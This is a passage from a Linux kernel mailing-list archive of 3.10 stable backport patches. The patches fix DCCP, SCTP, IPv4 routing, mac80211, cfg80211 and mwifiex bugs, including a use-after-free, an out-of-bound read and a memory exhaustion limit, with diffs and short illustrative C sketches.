 [<ffffffff811727d8>] task_work_run+0xf8/0x170 kernel/task_work.c:116
 [<     inline     >] exit_task_work include/linux/task_work.h:21
 [<ffffffff8111bc53>] do_exit+0x883/0x2ac0 kernel/exit.c:828
 [<ffffffff811221fe>] do_group_exit+0x10e/0x340 kernel/exit.c:931
 [<ffffffff81143c94>] get_signal+0x634/0x15a0 kernel/signal.c:2307
 [<ffffffff81054aad>] do_signal+0x8d/0x1a30 arch/x86/kernel/signal.c:807
 [<ffffffff81003a05>] exit_to_usermode_loop+0xe5/0x130 arch/x86/entry/common.c:156
 [<     inline     >] prepare_exit_to_usermode arch/x86/entry/common.c:190
 [<ffffffff81006298>] syscall_return_slowpath+0x1a8/0x1e0 arch/x86/entry/common.c:259
 [<ffffffff83fc1a62>] entry_SYSCALL_64_fastpath+0xc0/0xc2
Dumping ftrace buffer:
   (ftrace buffer empty)
Kernel Offset: disabled

Fix this the same way we did for TCP in commit 565b7b2d2e63
("tcp: do not send reset to already closed sockets")

Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/proto.c | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/net/dccp/proto.c b/net/dccp/proto.c
index 6c7c78b8..cb55fb9 100644
--- a/net/dccp/proto.c
+++ b/net/dccp/proto.c
@@ -1012,6 +1012,10 @@ void dccp_close(struct sock *sk, long timeout)
 		__kfree_skb(skb);
 	}
 
+	/* If socket has been already reset kill it. */
+	if (sk->sk_state == DCCP_CLOSED)
+		goto adjudge_to_death;
+
 	if (data_was_unread) {
 		/* Unread data was tossed, send an appropriate Reset Code */
 		DCCP_WARN("ABORT with %u bytes unread\n", data_was_unread);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (160 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 261/319] dccp: do not send reset to already closed sockets Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect Willy Tarreau
                   ` (56 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Eric Dumazet, David S . Miller, Willy Tarreau

From: Eric Dumazet <edumazet@google.com>

commit 6706a97fec963d6cb3f7fc2978ec1427b4651214 upstream.

dccp_v4_err() does not use pskb_may_pull() and might access garbage.

We only need 4 bytes at the beginning of the DCCP header, like TCP,
so the 8 bytes pulled in icmp_socket_deliver() are more than enough.

This patch might allow more ICMP messages to be processed, as some
routers still limit the size of reflected bytes to 28 (RFC 792), instead
of using extended lengths (RFC 1812 4.3.2.3).
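
The compile-time guard used for this can be sketched in plain C11. This
is an illustration under assumptions, not the kernel code: OFFSETOFEND()
mimics the kernel's offsetofend(), struct demo_dccp_hdr is a
hypothetical stand-in for the start of struct dccp_hdr, and
ICMP_PULLED_BYTES names the 8 bytes mentioned above.

```c
#include <stddef.h>
#include <stdint.h>

/* Offset of the first byte past MEMBER, like the kernel's offsetofend(). */
#define OFFSETOFEND(type, member) \
	(offsetof(type, member) + sizeof(((type *)0)->member))

/* Hypothetical stand-in for the first 8 bytes of a DCCP header. */
struct demo_dccp_hdr {
	uint16_t sport;
	uint16_t dport;
	uint8_t  doff;
	uint8_t  cscov_ccval;
	uint16_t checksum;
};

/* Bytes the caller is assumed to have made available already. */
#define ICMP_PULLED_BYTES 8

/* Fail the build if either port field extended past the pulled bytes. */
_Static_assert(OFFSETOFEND(struct demo_dccp_hdr, sport) <= ICMP_PULLED_BYTES,
	       "sport must lie within the pulled bytes");
_Static_assert(OFFSETOFEND(struct demo_dccp_hdr, dport) <= ICMP_PULLED_BYTES,
	       "dport must lie within the pulled bytes");
```

Because both fields end within the first 4 bytes, no runtime length
check is needed before reading them, as long as the caller's 8-byte
guarantee holds.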

Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/dccp/ipv4.c | 14 ++++++++------
 1 file changed, 8 insertions(+), 6 deletions(-)

diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
index ebc54fe..294c642 100644
--- a/net/dccp/ipv4.c
+++ b/net/dccp/ipv4.c
@@ -212,7 +212,7 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
 {
 	const struct iphdr *iph = (struct iphdr *)skb->data;
 	const u8 offset = iph->ihl << 2;
-	const struct dccp_hdr *dh = (struct dccp_hdr *)(skb->data + offset);
+	const struct dccp_hdr *dh;
 	struct dccp_sock *dp;
 	struct inet_sock *inet;
 	const int type = icmp_hdr(skb)->type;
@@ -222,11 +222,13 @@ static void dccp_v4_err(struct sk_buff *skb, u32 info)
 	int err;
 	struct net *net = dev_net(skb->dev);
 
-	if (skb->len < offset + sizeof(*dh) ||
-	    skb->len < offset + __dccp_basic_hdr_len(dh)) {
-		ICMP_INC_STATS_BH(net, ICMP_MIB_INERRORS);
-		return;
-	}
+	/* Only need dccph_dport & dccph_sport which are the first
+	 * 4 bytes in dccp header.
+	 * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
+	 */
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
+	dh = (struct dccp_hdr *)(skb->data + offset);
 
 	sk = inet_lookup(net, &dccp_hashinfo,
 			iph->daddr, dh->dccph_dport,
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (161 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 262/319] dccp: fix out of bound access in dccp_v4_err() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() Willy Tarreau
                   ` (55 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Marcelo Ricardo Leitner, David S . Miller, Willy Tarreau

From: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>

commit 7233bc84a3aeda835d334499dc00448373caf5c0 upstream.

sctp_wait_for_connect() already holds the asoc to keep it alive during
the sleep, in case another thread releases it. But Andrey Konovalov and
Dmitry Vyukov reported a use-after-free in such a situation.

The problem is that __sctp_connect() doesn't get a ref on the asoc and
reads the asoc after calling sctp_wait_for_connect(), but by then
another thread may have closed it, and the _put in
sctp_wait_for_connect() will actually release it, causing the
use-after-free.

The fix is to do the read before waiting for the connect instead of
after it, which avoids this issue because the socket is still locked at
that point. There should be no issue with returning the asoc id in case
of failure, as the application shouldn't trust that number in such
situations anyway.

This issue doesn't exist in sctp_sendmsg() path.

Reported-by: Dmitry Vyukov <dvyukov@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: Marcelo Ricardo Leitner <marcelo.leitner@gmail.com>
Reviewed-by: Xin Long <lucien.xin@gmail.com>
Acked-by: Neil Horman <nhorman@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/sctp/socket.c | 7 +++++--
 1 file changed, 5 insertions(+), 2 deletions(-)

diff --git a/net/sctp/socket.c b/net/sctp/socket.c
index 86e7352..ede7c54 100644
--- a/net/sctp/socket.c
+++ b/net/sctp/socket.c
@@ -1231,9 +1231,12 @@ static int __sctp_connect(struct sock* sk,
 
 	timeo = sock_sndtimeo(sk, f_flags & O_NONBLOCK);
 
-	err = sctp_wait_for_connect(asoc, &timeo);
-	if ((err == 0 || err == -EINPROGRESS) && assoc_id)
+	if (assoc_id)
 		*assoc_id = asoc->assoc_id;
+	err = sctp_wait_for_connect(asoc, &timeo);
+	/* Note: the asoc may be freed after the return of
+	 * sctp_wait_for_connect.
+	 */
 
 	/* Don't free association on exit. */
 	asoc = NULL;
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup()
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (162 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 263/319] sctp: assign assoc_id earlier in __sctp_connect Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup Willy Tarreau
                   ` (54 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: WANG Cong, David S . Miller, Willy Tarreau

From: WANG Cong <xiyou.wangcong@gmail.com>

commit 2c1a4311b61072afe2309d4152a7993e92caa41c upstream.

Fixes: commit f187bc6efb7250afee0e2009b6106 ("ipv4: No need to set generic neighbour pointer")
Cc: David S. Miller <davem@davemloft.net>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/route.c | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index 93efb89..cbad9b8 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -714,7 +714,7 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
 	}
 
 	n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
-	if (n) {
+	if (!IS_ERR(n)) {
 		if (!(n->nud_state & NUD_VALID)) {
 			neigh_event_send(n, NULL);
 		} else {
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (163 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 264/319] neigh: check error pointer instead of NULL for ipv4_neigh_lookup() Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue Willy Tarreau
                   ` (53 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux
  Cc: Stephen Suryaputra Lin, Stephen Suryaputra Lin, David S . Miller,
	Willy Tarreau

From: Stephen Suryaputra Lin <stephen.suryaputra.lin@gmail.com>

commit 969447f226b451c453ddc83cac6144eaeac6f2e3 upstream.

In v2.6, ip_rt_redirect() calls arp_bind_neighbour() which returns 0
and then the state of the neigh for the new_gw is checked. If the state
isn't valid then the redirected route is deleted. This behavior is
maintained up to v3.5.7 by check_peer_redirect() because rt->rt_gateway
is assigned to peer->redirect_learned.a4 before calling
ipv4_neigh_lookup().

After commit 5943634fc559 ("ipv4: Maintain redirect and PMTU info in
struct rtable again."), ipv4_neigh_lookup() is performed without the
rt_gateway assigned to the new_gw. In the case when rt_gateway (old_gw)
isn't zero, the function uses it as the key. The neigh is most likely
valid since the old_gw is the one that sends the ICMP redirect message.
Then the new_gw is assigned to fib_nh_exception. The problem is: the
new_gw ARP may never get resolved and the traffic is blackholed.

So, use the new_gw for neigh lookup.

Changes from v1:
 - use __ipv4_neigh_lookup instead (per Eric Dumazet).

Fixes: 5943634fc559 ("ipv4: Maintain redirect and PMTU info in struct rtable again.")
Signed-off-by: Stephen Suryaputra Lin <ssurya@ieee.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/ipv4/route.c | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/net/ipv4/route.c b/net/ipv4/route.c
index cbad9b8..e59d633 100644
--- a/net/ipv4/route.c
+++ b/net/ipv4/route.c
@@ -713,7 +713,9 @@ static void __ip_do_redirect(struct rtable *rt, struct sk_buff *skb, struct flow
 			goto reject_redirect;
 	}
 
-	n = ipv4_neigh_lookup(&rt->dst, NULL, &new_gw);
+	n = __ipv4_neigh_lookup(rt->dst.dev, new_gw);
+	if (!n)
+		n = neigh_create(&arp_tbl, &new_gw, rt->dst.dev);
 	if (!IS_ERR(n)) {
 		if (!(n->nud_state & NUD_VALID)) {
 			neigh_event_send(n, NULL);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (164 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 265/319] ipv4: use new_gw for redirect neigh lookup Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs Willy Tarreau
                   ` (52 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Felix Fietkau, Johannes Berg, Willy Tarreau

From: Felix Fietkau <nbd@nbd.name>

commit 6b07d9ca9b5363dda959b9582a3fc9c0b89ef3b5 upstream.

The code currently assumes that buffered multicast PS frames don't have
a pending ACK frame for tx status reporting.
However, hostapd sends a broadcast deauth frame on teardown for which tx
status is requested. This can lead to the "Have pending ack frames"
warning on module reload.
Fix this by using ieee80211_free_txskb/ieee80211_purge_tx_queue.

Signed-off-by: Felix Fietkau <nbd@nbd.name>
Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/mac80211/cfg.c | 2 +-
 net/mac80211/tx.c  | 6 +++---
 2 files changed, 4 insertions(+), 4 deletions(-)

diff --git a/net/mac80211/cfg.c b/net/mac80211/cfg.c
index e922bf3..11a10d5 100644
--- a/net/mac80211/cfg.c
+++ b/net/mac80211/cfg.c
@@ -1072,7 +1072,7 @@ static int ieee80211_stop_ap(struct wiphy *wiphy, struct net_device *dev)
 
 	/* free all potentially still buffered bcast frames */
 	local->total_ps_buffered -= skb_queue_len(&sdata->u.ap.ps.bc_buf);
-	skb_queue_purge(&sdata->u.ap.ps.bc_buf);
+	ieee80211_purge_tx_queue(&local->hw, &sdata->u.ap.ps.bc_buf);
 
 	ieee80211_vif_copy_chanctx_to_vlans(sdata, true);
 	ieee80211_vif_release_channel(sdata);
diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
index e960fbe..1299053 100644
--- a/net/mac80211/tx.c
+++ b/net/mac80211/tx.c
@@ -335,7 +335,7 @@ static void purge_old_ps_buffers(struct ieee80211_local *local)
 		skb = skb_dequeue(&ps->bc_buf);
 		if (skb) {
 			purged++;
-			dev_kfree_skb(skb);
+			ieee80211_free_txskb(&local->hw, skb);
 		}
 		total += skb_queue_len(&ps->bc_buf);
 	}
@@ -417,7 +417,7 @@ ieee80211_tx_h_multicast_ps_buf(struct ieee80211_tx_data *tx)
 	if (skb_queue_len(&ps->bc_buf) >= AP_MAX_BC_BUFFER) {
 		ps_dbg(tx->sdata,
 		       "BC TX buffer full - dropping the oldest frame\n");
-		dev_kfree_skb(skb_dequeue(&ps->bc_buf));
+		ieee80211_free_txskb(&tx->local->hw, skb_dequeue(&ps->bc_buf));
 	} else
 		tx->local->total_ps_buffered++;
 
@@ -2711,7 +2711,7 @@ ieee80211_get_buffered_bc(struct ieee80211_hw *hw,
 			sdata = IEEE80211_DEV_TO_SUB_IF(skb->dev);
 		if (!ieee80211_tx_prepare(sdata, &tx, skb))
 			break;
-		dev_kfree_skb_any(skb);
+		ieee80211_free_txskb(hw, skb);
 	}
 
 	info = IEEE80211_SKB_CB(skb);
-- 
2.8.0.rc2.1.gbe9624a

^ permalink raw reply related	[flat|nested] 239+ messages in thread

* [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (165 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 266/319] mac80211: fix purging multicast PS buffer queue Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 268/319] cfg80211: limit scan results cache size Willy Tarreau
                   ` (51 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johannes Berg, Willy Tarreau

From: Johannes Berg <johannes.berg@intel.com>

commit ea720935cf6686f72def9d322298bf7e9bd53377 upstream.

In mac80211, multicast A-MSDUs are accepted in many cases that
they shouldn't be accepted in:
 * drop A-MSDUs with a multicast A1 (RA), as required by the
   spec in 9.11 (802.11-2012 version)
 * drop A-MSDUs with a 4-addr header, since the fourth address
   can't actually be useful for them, unless 4-address frame
   format is actually requested (the fourth address is still
   not useful in that case, but it is ignored)

Accepting the first case, in particular, is very problematic
since it allows anyone else with possession of a GTK to send
unicast frames encapsulated in a multicast A-MSDU, even when
the AP has client isolation enabled.
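
The two rules above can be written as a small predicate. This is a
userspace sketch, not the mac80211 code: struct demo_rx, enum
demo_iftype and amsdu_acceptable() are hypothetical, and the single
four_addr_enabled flag stands in for u.vlan.sta on AP_VLAN interfaces
and u.mgd.use_4addr on station interfaces.

```c
#include <stdbool.h>

enum demo_iftype { DEMO_AP, DEMO_AP_VLAN, DEMO_STATION };

struct demo_rx {
	bool has_a4;			/* frame carries a 4-address header */
	bool ra_is_multicast;		/* A1 (RA) is a multicast address */
	enum demo_iftype iftype;	/* receiving interface type */
	bool four_addr_enabled;		/* 4-addr mode requested on the interface */
};

/* Returns true if an A-MSDU with these properties may be processed. */
static bool amsdu_acceptable(const struct demo_rx *rx)
{
	if (rx->has_a4) {
		switch (rx->iftype) {
		case DEMO_AP_VLAN:
		case DEMO_STATION:
			/* 4-addr A-MSDUs only where 4-addr mode is in use */
			if (!rx->four_addr_enabled)
				return false;
			break;
		default:
			return false;
		}
	}

	/* A multicast RA is never acceptable for an A-MSDU. */
	if (rx->ra_is_multicast)
		return false;

	return true;
}
```

Note that the multicast test is unconditional: it applies whether or not
the frame uses the 4-address format, which is what closes the client
isolation bypass described above.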

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/mac80211/rx.c | 24 +++++++++++++++---------
 1 file changed, 15 insertions(+), 9 deletions(-)

diff --git a/net/mac80211/rx.c b/net/mac80211/rx.c
index cd60be8..f8c7f46 100644
--- a/net/mac80211/rx.c
+++ b/net/mac80211/rx.c
@@ -1952,16 +1952,22 @@ ieee80211_rx_h_amsdu(struct ieee80211_rx_data *rx)
 	if (!(status->rx_flags & IEEE80211_RX_AMSDU))
 		return RX_CONTINUE;
 
-	if (ieee80211_has_a4(hdr->frame_control) &&
-	    rx->sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
-	    !rx->sdata->u.vlan.sta)
-		return RX_DROP_UNUSABLE;
+	if (unlikely(ieee80211_has_a4(hdr->frame_control))) {
+		switch (rx->sdata->vif.type) {
+		case NL80211_IFTYPE_AP_VLAN:
+			if (!rx->sdata->u.vlan.sta)
+				return RX_DROP_UNUSABLE;
+			break;
+		case NL80211_IFTYPE_STATION:
+			if (!rx->sdata->u.mgd.use_4addr)
+				return RX_DROP_UNUSABLE;
+			break;
+		default:
+			return RX_DROP_UNUSABLE;
+		}
+	}
 
-	if (is_multicast_ether_addr(hdr->addr1) &&
-	    ((rx->sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
-	      rx->sdata->u.vlan.sta) ||
-	     (rx->sdata->vif.type == NL80211_IFTYPE_STATION &&
-	      rx->sdata->u.mgd.use_4addr)))
+	if (is_multicast_ether_addr(hdr->addr1))
 		return RX_DROP_UNUSABLE;
 
 	skb->dev = dev;
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 268/319] cfg80211: limit scan results cache size
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (166 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 267/319] mac80211: discard multicast and 4-addr A-MSDUs Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs Willy Tarreau
                   ` (50 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Johannes Berg, Willy Tarreau

From: Johannes Berg <johannes.berg@intel.com>

commit 9853a55ef1bb66d7411136046060bbfb69c714fa upstream.

It's possible to make scanning consume almost arbitrary amounts
of memory, e.g. by sending beacon frames with random BSSIDs at
high rates while somebody is scanning.

Limit the number of BSS table entries we're willing to cache to
1000, limiting maximum memory usage to maybe 4-5MB, but lower
in practice - that would be the case for having both full-sized
beacon and probe response frames for each entry; this seems not
possible in practice, so a limit of 1000 entries will likely be
closer to 0.5 MB.
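
As a rough illustration of the policy (not the cfg80211 code), the
following userspace sketch caps a table at a fixed number of entries
and, when full, evicts the oldest entry that is not held. If every
entry is held, the new one is dropped. The names struct cache,
cache_add() and CACHE_LIMIT are assumptions made for this example, and
timestamps are compared with a plain "<" rather than the
wraparound-safe time_before() used in the kernel.

```c
#include <stdbool.h>
#include <stddef.h>

#define CACHE_LIMIT 4	/* stand-in for bss_entries_limit (1000 in the patch) */

struct entry {
	unsigned long ts;	/* last-seen timestamp */
	int hold;		/* non-zero: in use, must not be evicted */
	int id;
};

struct cache {
	struct entry e[CACHE_LIMIT];
	size_t n;
};

/* Remove the oldest entry that is not held; false if none qualifies. */
bool cache_expire_oldest(struct cache *c)
{
	size_t i, oldest = c->n;	/* c->n means "none found yet" */

	for (i = 0; i < c->n; i++) {
		if (c->e[i].hold)
			continue;
		if (oldest != c->n && c->e[oldest].ts < c->e[i].ts)
			continue;
		oldest = i;
	}

	if (oldest == c->n)
		return false;

	/* Order is irrelevant here, so fill the gap with the last entry. */
	c->e[oldest] = c->e[c->n - 1];
	c->n--;
	return true;
}

/* Add an entry, evicting the oldest one first if the table is full. */
bool cache_add(struct cache *c, int id, unsigned long ts)
{
	if (c->n >= CACHE_LIMIT && !cache_expire_oldest(c))
		return false;	/* nothing evictable: drop the new entry */

	c->e[c->n].id = id;
	c->e[c->n].ts = ts;
	c->e[c->n].hold = 0;
	c->n++;
	return true;
}
```

The entry count is maintained on every add and remove, which is what
makes the limit check O(1); only the eviction itself walks the table.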

Signed-off-by: Johannes Berg <johannes.berg@intel.com>
Signed-off-by: Willy Tarreau <w@1wt.eu>
---
 net/wireless/core.h |  1 +
 net/wireless/scan.c | 69 +++++++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 70 insertions(+)

diff --git a/net/wireless/core.h b/net/wireless/core.h
index fd35dae..d06da43 100644
--- a/net/wireless/core.h
+++ b/net/wireless/core.h
@@ -69,6 +69,7 @@ struct cfg80211_registered_device {
 	struct list_head bss_list;
 	struct rb_root bss_tree;
 	u32 bss_generation;
+	u32 bss_entries;
 	struct cfg80211_scan_request *scan_req; /* protected by RTNL */
 	struct cfg80211_sched_scan_request *sched_scan_req;
 	unsigned long suspend_at;
diff --git a/net/wireless/scan.c b/net/wireless/scan.c
index 81019ee..15ef127 100644
--- a/net/wireless/scan.c
+++ b/net/wireless/scan.c
@@ -55,6 +55,19 @@
  * also linked into the probe response struct.
  */
 
+/*
+ * Limit the number of BSS entries stored in mac80211. Each one is
+ * a bit over 4k at most, so this limits to roughly 4-5M of memory.
+ * If somebody wants to really attack this though, they'd likely
+ * use small beacons, and only one type of frame, limiting each of
+ * the entries to a much smaller size (in order to generate more
+ * entries in total, so overhead is bigger.)
+ */
+static int bss_entries_limit = 1000;
+module_param(bss_entries_limit, int, 0644);
+MODULE_PARM_DESC(bss_entries_limit,
+                 "limit to number of scan BSS entries (per wiphy, default 1000)");
+
 #define IEEE80211_SCAN_RESULT_EXPIRE	(30 * HZ)
 
 static void bss_free(struct cfg80211_internal_bss *bss)
@@ -135,6 +148,10 @@ static bool __cfg80211_unlink_bss(struct cfg80211_registered_device *dev,
 
 	list_del_init(&bss->list);
 	rb_erase(&bss->rbn, &dev->bss_tree);
+	dev->bss_entries--;
+	WARN_ONCE((dev->bss_entries == 0) ^ list_empty(&dev->bss_list),
+		  "rdev bss entries[%d]/list[empty:%d] corruption\n",
+		  dev->bss_entries, list_empty(&dev->bss_list));
 	bss_ref_put(dev, bss);
 	return true;
 }
@@ -338,6 +355,40 @@ void cfg80211_bss_expire(struct cfg80211_registered_device *dev)
 	__cfg80211_bss_expire(dev, jiffies - IEEE80211_SCAN_RESULT_EXPIRE);
 }
 
+static bool cfg80211_bss_expire_oldest(struct cfg80211_registered_device *rdev)
+{
+	struct cfg80211_internal_bss *bss, *oldest = NULL;
+	bool ret;
+
+	lockdep_assert_held(&rdev->bss_lock);
+
+	list_for_each_entry(bss, &rdev->bss_list, list) {
+		if (atomic_read(&bss->hold))
+			continue;
+
+		if (!list_empty(&bss->hidden_list) &&
+		    !bss->pub.hidden_beacon_bss)
+			continue;
+
+		if (oldest && time_before(oldest->ts, bss->ts))
+			continue;
+		oldest = bss;
+	}
+
+	if (WARN_ON(!oldest))
+		return false;
+
+	/*
+	 * The callers make sure to increase rdev->bss_generation if anything
+	 * gets removed (and a new entry added), so there's no need to also do
+	 * it here.
+	 */
+
+	ret = __cfg80211_unlink_bss(rdev, oldest);
+	WARN_ON(!ret);
+	return ret;
+}
+
 const u8 *cfg80211_find_ie(u8 eid, const u8 *ies, int len)
 {
 	while (len > 2 && ies[0] != eid) {
@@ -622,6 +673,7 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev,
 	const u8 *ie;
 	int i, ssidlen;
 	u8 fold = 0;
+	u32 n_entries = 0;
 
 	ies = rcu_access_pointer(new->pub.beacon_ies);
 	if (WARN_ON(!ies))
@@ -645,6 +697,12 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev,
 	/* This is the bad part ... */
 
 	list_for_each_entry(bss, &dev->bss_list, list) {
+		/*
+		 * we're iterating all the entries anyway, so take the
+		 * opportunity to validate the list length accounting
+		 */
+		n_entries++;
+
 		if (!ether_addr_equal(bss->pub.bssid, new->pub.bssid))
 			continue;
 		if (bss->pub.channel != new->pub.channel)
@@ -674,6 +732,10 @@ static bool cfg80211_combine_bsses(struct cfg80211_registered_device *dev,
 				   new->pub.beacon_ies);
 	}
 
+	WARN_ONCE(n_entries != dev->bss_entries,
+		  "rdev bss entries[%d]/list[len:%d] corruption\n",
+		  dev->bss_entries, n_entries);
+
 	return true;
 }
 
@@ -818,7 +880,14 @@ cfg80211_bss_update(struct cfg80211_registered_device *dev,
 			}
 		}
 
+		if (dev->bss_entries >= bss_entries_limit &&
+		    !cfg80211_bss_expire_oldest(dev)) {
+			kfree(new);
+			goto drop;
+		}
+
 		list_add_tail(&new->list, &dev->bss_list);
+		dev->bss_entries++;
 		rb_insert_bss(dev, new);
 		found = new;
 	}
-- 
2.8.0.rc2.1.gbe9624a

* [PATCH 3.10 269/319] mwifiex: printk() overflow with 32-byte SSIDs
  2017-02-05 19:18 [PATCH 3.10 100/319] fix fault_in_multipages_...() on architectures with no-op access_ok() Willy Tarreau
                   ` (167 preceding siblings ...)
  2017-02-05 19:21 ` [PATCH 3.10 268/319] cfg80211: limit scan results cache size Willy Tarreau
@ 2017-02-05 19:21 ` Willy Tarreau
  2017-02-05 19:21 ` [PATCH 3.10 270/319] ipv4: Set skb->protocol properly for local output Willy Tarreau
                   ` (49 subsequent siblings)
  218 siblings, 0 replies; 239+ messages in thread
From: Willy Tarreau @ 2017-02-05 19:21 UTC (permalink / raw)
  To: linux-kernel, stable, linux; +Cc: Brian Norris, Kalle Valo, Willy Tarreau

From: Brian Norris <briannorris@chromium.org>

commit fcd2042e8d36cf644bd2d69c26378d17158b17df upstream.

SSIDs aren't guaranteed to be 0-terminated. Let's cap the max length
when we print them out.

This can be easily noticed by connecting to a network with a 32-octet
SSID:

[ 3903.502925] mwifiex_pcie 0000:01:00.0: info: trying to associate to
'0123456789abcdef0123456789abcdef <uninitialized mem>' bssid
xx:xx:xx:xx:xx:xx
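
The "%.*s" conversion used by the fix takes the maximum number of bytes
to print as an extra int argument, so the buffer does not need to be
0-terminated. A minimal userspace sketch using standard snprintf()
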